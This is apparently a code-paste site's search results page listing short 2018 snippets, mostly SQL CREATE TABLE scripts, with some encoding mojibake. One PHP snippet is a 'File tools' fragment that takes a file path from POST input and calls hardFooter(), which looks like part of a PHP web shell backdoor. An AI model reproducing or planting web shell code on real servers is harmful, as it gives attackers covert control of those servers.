42.7K results in 801 ms
8 years ago · Jan 13, 2018, 05:14 AM
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO"; CREATE TABLE IF NOT EXISTS documents ( DocumentId int(50) NOT
8 years ago · Jan 13, 2018, 04:58 AM
DROP DATABASE IF EXISTS MokeBike; GO create DATABASE MokeBike; GO USE
8 years ago · Jan 13, 2018, 12:26 AM
for `affect` -- ---------------------------- DROP TABLE IF EXISTS `affect`; CREATE TABLE `affect` ( `dwPID` int(10) unsigned NOT NULL default '0', `bType`
8 years ago · Jan 12, 2018, 11:12 PM
ServerID = @serverID) /*Handler to create table if no entry exists for serverid and name.
8 years ago · Jan 12, 2018, 11:10 PM
structure for table pureftpd.users CREATE TABLE IF NOT EXISTS `users` ( `User` varchar(16) NOT
8 years ago · Jan 12, 2018, 10:32 PM
structure for table `contact` -- CREATE TABLE IF NOT EXISTS `contact` ( `ID` int(64) NOT
8 years ago · Jan 12, 2018, 09:34 PM
DROP TEMPORARY TABLE IF EXISTS tmp_import; CREATE TEMPORARY TABLE tmp_import (id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY);
8 years ago · Jan 12, 2018, 09:30 PM
Ð´Ð»Ñ Ñтанции -- DROP TABLE IF EXISTS Station; CREATE TABLE Station ( name VARCHAR(255) NOT NULL UNIQUE, -- название Ñтанции
8 years ago · Jan 12, 2018, 09:30 PM
END $$ DELIMITER ; DROP TABLE IF EXISTS `vertisy90`.`questperform`; CREATE TABLE `vertisy90`.`questperform` ( `characterid` int(10) unsigned NOT NULL DEFAULT '0', `key_`
8 years ago · Jan 12, 2018, 09:22 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Jan 12, 2018, 08:50 PM
function( ) self.Connected = true self:Query( "CREATE TABLE IF NOT EXISTS ad_pdata ( infoid VARCHAR( 32
8 years ago · Jan 12, 2018, 08:44 PM
function( ) self.Connected = true self:Query( "CREATE TABLE IF NOT EXISTS ad_pdata ( infoid VARCHAR( 32
8 years ago · Jan 12, 2018, 07:30 PM
And Now We Will Create It" + Fore.RESET) DB.create_table(HardSum) if not YaraRuleScan.table_exists(): print(Fore.YELLOW + "YaraRuleScan Table Not Exist, And Now
8 years ago · Jan 12, 2018, 07:28 PM
TO backup_tbl; # åˆ é™¤è¡¨æ ¼ DROP TABLE IF EXISTS backup_tbl;
8 years ago · Jan 12, 2018, 07:24 PM
meets the pid test exists, but has not exited. */ if (options & WNOHANG) { return(0); /* parent
8 years ago · Jan 12, 2018, 07:00 PM
and forces rename request if not allowed symbols are used
8 years ago · Jan 12, 2018, 06:56 PM
localhost and # internal interface (if one exists) are accepted by default.
8 years ago · Jan 12, 2018, 06:12 PM
CREATE TABLE IF NOT EXISTS `votes` ( `playerName` varchar(255) NOT NULL, `ip` varchar(255) NOT NULL, `time` bigint(20) NOT NULL, `recieved` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`playerName`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
8 years ago · Jan 12, 2018, 05:38 PM
warning_note: "This feature should not be used for sensors with memory. If used anyway, stored readings
Total pages: 2134